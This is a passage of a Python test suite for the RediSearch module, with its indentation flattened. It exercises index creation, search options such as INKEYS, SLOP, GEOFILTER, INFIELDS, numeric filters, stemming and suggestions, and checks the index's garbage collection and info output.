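    # INKEYS limits results to the supplied keys; non-existing keys yield no hits and bad counts raise errors.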
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text'))
for i in range(200):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world'))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
for keys in (
['doc%d' % i for i in range(10)], ['doc%d' % i for i in range(0, 30, 2)], [
'doc%d' % i for i in range(99, 0, -5)]
):
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', len(keys), *keys)
env.assertEqual(len(keys), res[0])
env.assertTrue(all((k in res for k in keys)))
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', 3, 'foo', 'bar', 'baz')[0])
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', 99)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', -1)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'inkeys', 4, 'foo')
def testSlopInOrder(env):
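    # SLOP/INORDER: larger slop values admit docs with more terms between t1 and t2; reversed order only matches without INORDER.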
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 't1 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1, 'fields',
'title', 't1 t3 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3', 1, 'fields',
'title', 't1 t3 t4 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc4', 1, 'fields',
'title', 't1 t3 t4 t5 t2'))
res = r.execute_command(
'ft.search', 'idx', 't1|t4 t3|t2', 'slop', '0', 'inorder', 'nocontent')
env.assertEqual({'doc3', 'doc4', 'doc2', 'doc1'}, set(res[1:]))
res = r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'inorder')[0])
env.assertEqual(1, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '0', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '1', 'inorder')[0])
env.assertEqual(3, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '2', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '3', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'inorder')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't t1', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4', 'inorder')[0])
def testExact(env):
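    # Exact phrase search: quoted phrases match only docs containing them verbatim.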
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
res = r.execute_command(
'ft.search', 'idx', '"hello world"', 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', "hello \"another world\"", 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testGeoErrors(env):
env.expect('flushall')
env.expect('ft.create idx ON HASH schema name text location geo').equal('OK')
env.expect('ft.add idx hotel 1.0 fields name hill location -0.1757,51.5156').equal('OK')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1 km').equal([0L])
    # Insert error - works fine with the out-of-keyspace implementation
# env.expect('ft.add', 'idx', 'hotel1', 1, 'fields', 'name', '_hotel1', 'location', '1, 1').error() \
# .contains('Could not index geo value')
# Query errors
env.expect('ft.search idx hilton geofilter location lon 51.5156 1 km').error() \
.contains('Bad arguments for <lon>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location 51.5156 lat 1 km').error() \
.contains('Bad arguments for <lat>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 radius km').error() \
.contains('Bad arguments for <radius>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1 fake').error() \
.contains('Unknown distance unit fake')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1').error() \
.contains('GEOFILTER requires 5 arguments')
def testGeo(env):
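    # GEOFILTER arguments and the inline @location:[lon lat radius unit] syntax must give the same results.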
r = env
gsearch = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', query, 'geofilter', 'location', lon, lat, dist, unit, 'LIMIT', 0, 20)
gsearch_inline = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', '{} @location:[{} {} {} {}]'.format(query, lon, lat, dist, unit), 'LIMIT', 0, 20)
env.assertOk(r.execute_command('ft.create', 'idx', 'ON', 'HASH',
'schema', 'name', 'text', 'location', 'geo'))
for i, hotel in enumerate(hotels):
env.assertOk(r.execute_command('ft.add', 'idx', 'hotel{}'.format(i), 1.0, 'fields', 'name',
hotel[0], 'location', '{},{}'.format(hotel[2], hotel[1])))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
res = r.execute_command('ft.search', 'idx', 'hilton')
env.assertEqual(len(hotels), res[0])
res = gsearch('hilton', "-0.1757", "51.5156", '1')
env.assertEqual(3, res[0])
env.assertIn('hotel2', res)
env.assertIn('hotel21', res)
env.assertIn('hotel79', res)
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '1')
env.assertListEqual(res, res2)
res = gsearch('hilton', "-0.1757", "51.5156", '10')
env.assertEqual(14, res[0])
res2 = gsearch('hilton', "-0.1757", "51.5156", '10000', 'm')
env.assertListEqual(sorted(res), sorted(res2))
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '10')
env.assertListEqual(sorted(res), sorted(res2))
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'm')
env.assertEqual(1, res[0])
env.assertEqual('hotel94', res[1])
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'm')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res2[0])
env.assertListEqual(sorted(res), sorted(res2))
res = gsearch('heathrow', -0.44155, 51.45865, '5', 'km')
env.assertEqual(3, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '5', 'km')
env.assertListEqual(sorted(res), sorted(res2))
def testTagErrors(env):
env.expect("ft.create", "test", 'ON', 'HASH',
"SCHEMA", "tags", "TAG").equal('OK')
env.expect("ft.add", "test", "1", "1", "FIELDS", "tags", "alberta").equal('OK')
env.expect("ft.add", "test", "2", "1", "FIELDS", "tags", "ontario. alberta").equal('OK')
def testGeoDeletion(env):
if env.is_cluster():
raise unittest.SkipTest()
# Can't properly test if deleted on cluster
env.expect('ft.config', 'set', 'FORK_GC_CLEAN_THRESHOLD', 0).ok()
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema',
'g1', 'geo', 'g2', 'geo', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc3', 1.0, 'fields',
'g1', "-0.1757,51.5156",
't1', "hello")
# keys are: "geo:idx/g1" and "geo:idx/g2"
env.assertEqual(3, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g1')[0]))
env.assertEqual(2, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g2')[0]))
# Remove the first doc
env.cmd('ft.del', 'idx', 'doc1')
for _ in range(100):
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
env.assertEqual(2, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g1')[0]))
env.assertEqual(1, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g2')[0]))
# Replace the other one:
env.cmd('ft.add', 'idx', 'doc2', 1.0,
'replace', 'fields',
't1', 'just text here')
for _ in range(100):
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
env.assertEqual(1, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g1')[0]))
env.assertEqual(0, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g2')[0]))
def testInfields(env):
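    # INFIELDS restricts term and phrase matching to the listed fields.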
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'title', 'text', 'weight', 10.0, 'body', 'text', 'weight', 1.0))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello world lorem ipsum',
'body', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', 'hello', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"hello world\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"lorem ipsum\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', "infields", 2, "body", "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
def testScorerSelection(env):
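    # An existing scorer (TFIDF) is accepted; an unknown scorer name is an error.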
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text', 'body', 'text'))
# this is the default scorer
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'TFIDF')
env.assertEqual(res, [0])
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'NOSUCHSCORER')
def testFieldSelectors(env):
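    # Field selectors: @field:, multi-field @f1|f2:, unicode field names and escaped punctuation in field names.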
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'PREFIX', 1, 'doc',
'schema', 'TiTle', 'text', 'BoDy', 'text', "יוניקוד", 'text', 'field.with,punct', 'text'))
    # todo: document as a breaking change; ft.add field names are not case-insensitive
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'TiTle', 'hello world', 'BoDy', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 0.5, 'fields',
'BoDy', 'hello world', 'TiTle', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
res = r.execute_command(
'ft.search', 'idx', '@TiTle:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc1'])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:hello @TiTle:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:hello world @TiTle:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo) @TiTle:(world|bar)', 'nocontent')
env.assertEqual(sorted(res), sorted([2, 'doc1', 'doc2']))
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo world|bar)', 'nocontent')
env.assertEqual(sorted(res), sorted([2, 'doc1', 'doc2']))
res = r.execute_command(
'ft.search', 'idx', '@BoDy|TiTle:(hello world)', 'nocontent')
env.assertEqual(sorted(res), sorted([2, 'doc1', 'doc2']))
res = r.execute_command(
'ft.search', 'idx', '@יוניקוד:(unicode)', 'nocontent')
env.assertEqual(sorted(res), sorted([2, 'doc1', 'doc2']))
res = r.execute_command(
'ft.search', 'idx', '@field\\.with\\,punct:(punt)', 'nocontent')
env.assertEqual(sorted(res), sorted([2, 'doc1', 'doc2']))
def testStemming(env):
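    # Stemming makes 'kitty' match 'kitties'; VERBATIM disables the expansion.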
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello kitties'))
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "verbatim")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
# test for unknown language
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "language", "foofoofian")
def testExpander(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
res = r.execute_command(
'ft.search', 'idx', 'kitties',
"nocontent",
"expander", "SBSTEM"
)
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitties', "nocontent", "expander", "noexpander")
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent", 'verbatim')
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
    # Calling a stem directly works even with VERBATIM;
    # the '+' stem prefix just needs to be escaped.
res = r.execute_command(
'ft.search', 'idx', '\\+kitti', "nocontent", 'verbatim')
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
def testNumericRange(env):
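    # Numeric FILTER arguments and @score:[min max] query syntax, including exclusive bounds, infinities and multiple filters.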
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text', 'score', 'numeric', 'price', 'numeric'))
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 5).error().contains("FILTER requires 3 arguments")
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 5, 'inf').error().contains("Bad upper range: inf")
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 'inf', 5).error().contains("Bad lower range: inf")
for i in xrange(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'fields',
'title', 'hello kitty', 'score', i, 'price', 100 + 10 * i))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 100)
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 50)
env.assertEqual(51, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', 'verbatim', "nocontent", "limit", 0, 100,
"filter", "score", "(0", "(50")
env.assertEqual(49, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", "-inf", "+inf")
env.assertEqual(100, res[0])
# test multi filters
scrange = (19, 90)
prrange = (290, 385)
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", scrange[
0], scrange[1],
"filter", "price", prrange[0], prrange[1])
# print res
for doc in res[2::2]:
sc = int(doc[doc.index('score') + 1])
pr = int(doc[doc.index('price') + 1])
env.assertTrue(sc >= scrange[0] and sc <= scrange[1])
env.assertGreaterEqual(pr, prrange[0])
env.assertLessEqual(pr, prrange[1])
env.assertEqual(10, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", "19", "90",
"filter", "price", "90", "185")
env.assertEqual(0, res[0])
# Test numeric ranges as part of query syntax
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 100]', "nocontent")
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 50]', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', '@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty -@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[-inf +inf]', "nocontent")
env.assertEqual(100, res[0])
def testSuggestions(env):
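    # FT.SUGADD/SUGGET/SUGLEN/SUGDEL, including INCR, FUZZY matching, MAX and WITHSCORES.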
r = env
r.expect('ft.SUGADD', 'ac', 'hello world', 1).equal(1)
r.expect('ft.SUGADD', 'ac', 'hello world', 1, 'INCR').equal(1)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertEqual(1, len(res))
env.assertEqual("hello world", res[0])
terms = ["hello werld", "hallo world",
"yellow world", "wazzup", "herp", "derp"]
sz = 2
for term in terms:
r.expect('ft.SUGADD', 'ac', term, sz - 1).equal(sz)
sz += 1
for _ in r.retry_with_rdb_reload():
r.expect('ft.SUGLEN', 'ac').equal(7)
# search not fuzzy
r.expect("ft.SUGGET", "ac", "hello").equal(["hello world", "hello werld"])
# print r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1", "WITHSCORES")
    # fuzzy search - should yield more results
r.expect("ft.SUGGET", "ac", "hello", "FUZZY")\
.equal(['hello world', 'hello werld', 'yellow world', 'hallo world'])
# search fuzzy with limit of 1
r.expect("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1").equal(['hello world'])
    # scores should be returned with WITHSCORES
res = r.execute_command("ft.SUGGET", "ac", "hello", "WITHSCORES")
env.assertEqual(4, len(res))
env.assertTrue(float(res[1]) > 0)
env.assertTrue(float(res[3]) > 0)
r.expect("ft.SUGDEL", "ac", "hello world").equal(1L)
r.expect("ft.SUGDEL", "ac", "world").equal(0L)
r.expect("ft.SUGGET", "ac", "hello").equal(['hello werld'])
def testSuggestErrors(env):
env.expect('ft.SUGADD ac olah 1').equal(1)
env.expect('ft.SUGADD ac olah 1 INCR').equal(1)
env.expect('ft.SUGADD ac missing').error().contains("wrong number of arguments")
env.expect('ft.SUGADD ac olah not_a_number').error().contains("invalid score")
env.expect('ft.SUGADD ac olah 1 PAYLOAD').error().contains('Invalid payload: Expected an argument, but none provided')
env.expect('ft.SUGADD ac olah 1 REDIS PAYLOAD payload').error().contains('Unknown argument `REDIS`')
env.expect('ft.SUGGET ac olah FUZZ').error().contains("Unrecognized argument: FUZZ")
query = 'verylongquery'
for _ in range(3):
query += query
env.expect('ft.SUGGET ac', query).error().contains("Invalid query")
env.expect('ft.SUGGET ac', query + query).error().contains("Invalid query length")
def testSuggestPayload(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'PAYLOAD', 'foo'))
env.assertEqual(2, r.execute_command(
'ft.SUGADD', 'ac', 'hello werld', 1, 'PAYLOAD', 'bar'))
env.assertEqual(3, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload', 1, 'PAYLOAD', ''))
env.assertEqual(4, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload2', 1))
res = r.execute_command("FT.SUGGET", "ac", "hello", 'WITHPAYLOADS')
env.assertListEqual(['hello world', 'foo', 'hello werld', 'bar', 'hello nopayload', None, 'hello nopayload2', None],
res)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertListEqual(['hello world', 'hello werld', 'hello nopayload', 'hello nopayload2'],
res)
res = r.execute_command(
"FT.SUGGET", "ac", "hello", 'WITHPAYLOADS', 'WITHSCORES')
    # we don't compare the scores because they may change
env.assertEqual(12, len(res))
def testPayload(env):
r = env
env.expect('ft.create', 'idx', 'ON', 'HASH', 'PAYLOAD_FIELD', '__payload', 'schema', 'f', 'text').ok()
for i in range(10):
r.expect('ft.add', 'idx', '%d' % i, 1.0,
'payload', 'payload %d' % i,
'fields', 'f', 'hello world').ok()
for x in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
res = r.execute_command('ft.search', 'idx', 'hello world')
r.assertEqual(21, len(res))
res = r.execute_command('ft.search', 'idx', 'hello world', 'withpayloads')
r.assertEqual(31, len(res))
r.assertEqual(10, res[0])
for i in range(1, 30, 3):
r.assertEqual(res[i + 1], 'payload %s' % res[i])
def testGarbageCollector(env):
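    # After deleting all docs and forcing GC, the index reports zero docs/records and a smaller inverted index.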
env.skipOnCluster()
if env.moduleArgs is not None and 'GC_POLICY FORK' in env.moduleArgs:
        # this test is not relevant for fork gc because it does not clean the last block
raise unittest.SkipTest()
N = 100
r = env
r.expect('ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text').ok()
waitForIndex(r, 'idx')
for i in range(N):
r.expect('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'foo', ' '.join(('term%d' % random.randrange(0, 10) for i in range(10)))).ok()
def get_stats(r):
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
gc_stats = {d['gc_stats'][x]: float(
d['gc_stats'][x + 1]) for x in range(0, len(d['gc_stats']), 2)}
d['gc_stats'] = gc_stats
return d
stats = get_stats(r)
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 8)
env.assertEqual(0, stats['gc_stats']['bytes_collected'])
env.assertGreater(int(stats['num_records']), 0)
initialIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
for i in range(N):
r.expect('ft.del', 'idx', 'doc%d' % i).equal(1)
for _ in range(100):
        # gc is random, so invoke it enough times for it to take effect
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
stats = get_stats(r)
env.assertEqual(0, int(stats['num_docs']))
env.assertEqual(0, int(stats['num_records']))
if not env.is_cluster():
env.assertEqual(100, int(stats['max_doc_id']))
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 30)
currentIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
# print initialIndexSize, currentIndexSize,
# stats['gc_stats']['bytes_collected']
env.assertGreater(initialIndexSize, currentIndexSize)
env.assertGreater(stats['gc_stats'][
'bytes_collected'], currentIndexSize)
for i in range(10):
res = r.execute_command('ft.search', 'idx', 'term%d' % i)
env.assertEqual([0], res)
def testReturning(env):
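    # RETURN selects which fields come back; RETURN 0 returns doc ids only.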
env.assertCmdOk('ft.create', 'idx', 'ON', 'HASH', 'schema',
'f1', 'text',
'f2', 'text',
'n1', 'numeric', 'sortable',
'f3', 'text')
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'DOC_{0}'.format(i), 1.0, 'fields',
'f2', 'val2', 'f1', 'val1', 'f3', 'val3',
'n1', i)
# RETURN 0. Simplest case
for x in env.retry_with_reload():
waitForIndex(env, 'idx')
res = env.cmd('ft.search', 'idx', 'val*', 'return', '0')
env.assertEqual(11, len(res))
env.assertEqual(10, res[0])
for r in res[1:]:
env.assertTrue(r.startswith('DOC_'))
for field in ('f1', 'f2', 'f3', 'n1'):
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, field)
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
for pair in grouper(res[1:], 2):
docname, fields = pair
env.assertEqual(2, len(fields))
env.assertEqual(field, fields[0])
env.assertTrue(docname.startswith('DOC_'))
# Test that we don't return SORTBY fields if they weren't specified
# also in RETURN
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'f1',
'sortby', 'n1', 'ASC')
row = res[2]
# get the first result
env.assertEqual(['f1', 'val1'], row)
# Test when field is not found
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'nonexist')
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
    # Test that we don't crash if we're given the wrong number of fields
with env.assertResponseError():
res = env.cmd('ft.search', 'idx', 'val*', 'return', 700, 'nonexist')
def _test_create_options_real(env, *options):
options = [x for x in options if x]
has_offsets = 'NOOFFSETS' not in options
has_fields = 'NOFIELDS' not in options
has_freqs = 'NOFREQS' not in options
try:
env.cmd('ft.drop', 'idx')
# RS 2.0 ft.drop does not remove documents
env.flush()
except Exception as e:
pass
options = ['idx'] + options + ['ON', 'HASH', 'schema', 'f1', 'text', 'f2', 'text']
env.assertCmdOk('ft.create', *options)
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'doc{}'.format(
i), 0.5, 'fields', 'f1', 'value for {}'.format(i))
# Query
# res = env.cmd('ft.search', 'idx', "value for 3")
# if not has_offsets:
# env.assertIsNone(res)
# else:
# env.assertIsNotNone(res)
# Frequencies:
env.assertCmdOk('ft.add', 'idx', 'doc100',
1.0, 'fields', 'f1', 'foo bar')
env.assertCmdOk('ft.add', 'idx', 'doc200', 1.0,
'fields', 'f1', ('foo ' * 10) + ' bar')
res = env.cmd('ft.search', 'idx', 'foo')
env.assertEqual(2, res[0])
if has_offsets:
docname = res[1]
if has_freqs:
env.assertEqual('doc200', docname)
else:
env.assertEqual('doc100', docname)
env.assertCmdOk('ft.add', 'idx', 'doc300',
1.0, 'fields', 'f1', 'Hello')
res = env.cmd('ft.search', 'idx', '@f2:Hello')
if has_fields:
env.assertEqual(1, len(res))
else:
env.assertEqual(3, len(res))
def testCreationOptions(env):
from itertools import combinations
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
_test_create_options_real(env, *combo)
env.expect('ft.create', 'idx').error()
def testInfoCommand(env):
from itertools import combinations
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'NOFIELDS', 'schema', 'title', 'text'))
N = 50
for i in xrange(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'replace', 'fields',
'title', 'hello term%d' % i))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['index_name'], 'idx')
env.assertEqual(d['index_options'], ['NOFIELDS'])
env.assertListEqual(
d['fields'], [['title', 'type', 'TEXT', 'WEIGHT', '1']])
if not env.is_cluster():
env.assertEquals(int(d['num_docs']), N)
env.assertEquals(int(d['num_terms']), N + 1)
env.assertEquals(int(d['max_doc_id']), N)
env.assertEquals(int(d['records_per_doc_avg']), 2)
env.assertEquals(int(d['num_records']), N * 2)
env.assertGreater(float(d['offset_vectors_sz_mb']), 0)
env.assertGreater(float(d['key_table_size_mb']), 0)
env.assertGreater(float(d['inverted_sz_mb']), 0)
env.assertGreater(float(d['bytes_per_record_avg']), 0)
env.assertGreater(float(d['doc_table_size_mb']), 0)
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
combo = list(filter(None, combo))
options = combo + ['schema', 'f1', 'text']
try:
env.cmd('ft.drop', 'idx')
except:
pass
env.assertCmdOk('ft.create', 'idx', 'ON', 'HASH', *options)
info = env.cmd('ft.info', 'idx')
ix = info.index('index_options')
env.assertFalse(ix == -1)
opts = info[ix + 1]
# make sure that an empty opts string returns no options in
# info
if not combo:
env.assertListEqual([], opts)
for option in filter(None, combo):
env.assertTrue(option in opts)
def testNoStem(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH',
'schema', 'body', 'text', 'name', 'text', 'nostem')
if not env.isCluster():
        # todo: make this more generic so it also passes on cluster
res = env.cmd('ft.info', 'idx')
env.assertEqual(res[7][1][5], 'NOSTEM')
for _ in env.retry_with_reload():
waitForIndex(env, 'idx')
try:
env.cmd('ft.del', 'idx', 'doc')
except redis.ResponseError:
pass
# Insert a document
env.assertCmdOk('ft.add', 'idx', 'doc', 1.0, 'fields',
'body', "located",
'name', "located")
# Now search for the fields
res_body = env.cmd('ft.search', 'idx', '@body:location')
res_name = env.cmd('ft.search', 'idx', '@name:location')
env.assertEqual(0, res_name[0])
env.assertEqual(1, res_body[0])
def testSortbyMissingField(env):
